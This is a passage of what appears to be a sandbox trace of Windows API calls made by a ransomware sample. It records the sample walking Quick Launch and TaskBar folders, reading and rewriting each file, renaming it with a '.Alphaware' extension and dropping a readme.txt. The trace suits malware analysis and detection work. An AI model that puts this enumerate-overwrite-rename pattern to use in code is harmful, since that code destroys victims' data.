dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89b97360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk.Alphaware", cAlternateFileName="WINDOW~1.ALP")) returned 1 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89b97360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk.Alphaware", cAlternateFileName="WINDOW~1.ALP")) returned 0 [0093.176] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0093.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0093.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.176] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\*"), lpFindFileData=0x23e760 | out: lpFindFileData=0x23e760*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0093.176] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0093.177] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0093.177] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\*"), lpFindFileData=0x23e760 | out: lpFindFileData=0x23e760*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.177] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.177] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0093.177] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0093.177] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.177] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0093.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0093.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.178] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\*"), lpFindFileData=0x23e6c0 | out: lpFindFileData=0x23e6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.179] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.179] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.179] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.179] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\*"), lpFindFileData=0x23e6c0 | out: lpFindFileData=0x23e6c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.179] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.179] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0093.179] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0093.180] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\*"), lpFindFileData=0x23e6c0 | out: lpFindFileData=0x23e6c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f125f50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0093.180] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0093.181] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0093.181] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0093.181] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e6f0 | out: lpFindFileData=0x23e6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.181] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0093.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e618) returned 1 [0093.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0093.181] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini", dwFileAttributes=0x80) returned 1 [0093.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.201] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23c9e48 | out: lpFileInformation=0x23c9e48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f125f50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0093.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.202] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.202] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x19c [0093.202] ReadFile (in: hFile=0x250, lpBuffer=0x23ca310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x23ca310*, lpNumberOfBytesRead=0x23e818*=0x19c, lpOverlapped=0x0) returned 1 [0093.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.241] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.244] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23e930 | out: lpFileInformation=0x23e930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89c55a40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0093.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e5b8) returned 1 [0093.244] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.alphaware")) returned 1 [0093.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e728) returned 1 [0093.246] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e698) returned 1 [0093.248] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", dwFileAttributes=0x80) returned 1 [0093.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6d8) returned 1 [0093.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), fInfoLevelId=0x0, lpFileInformation=0x244e2b0 | out: lpFileInformation=0x244e2b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad)) returned 1 [0093.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e688) returned 1 [0093.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e768) returned 1 [0093.249] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6d8) returned 1 [0093.249] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23e8e8 | out: lpFileSizeHigh=0x23e8e8*=0x0) returned 0x5ad [0093.249] ReadFile (in: hFile=0x250, lpBuffer=0x244ec20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e818, lpOverlapped=0x0 | out: lpBuffer=0x244ec20*, lpNumberOfBytesRead=0x23e818*=0x5ad, lpOverlapped=0x0) returned 1 [0093.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e698) returned 1 [0093.274] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e608) returned 1 [0093.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e608) returned 1 [0093.305] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" 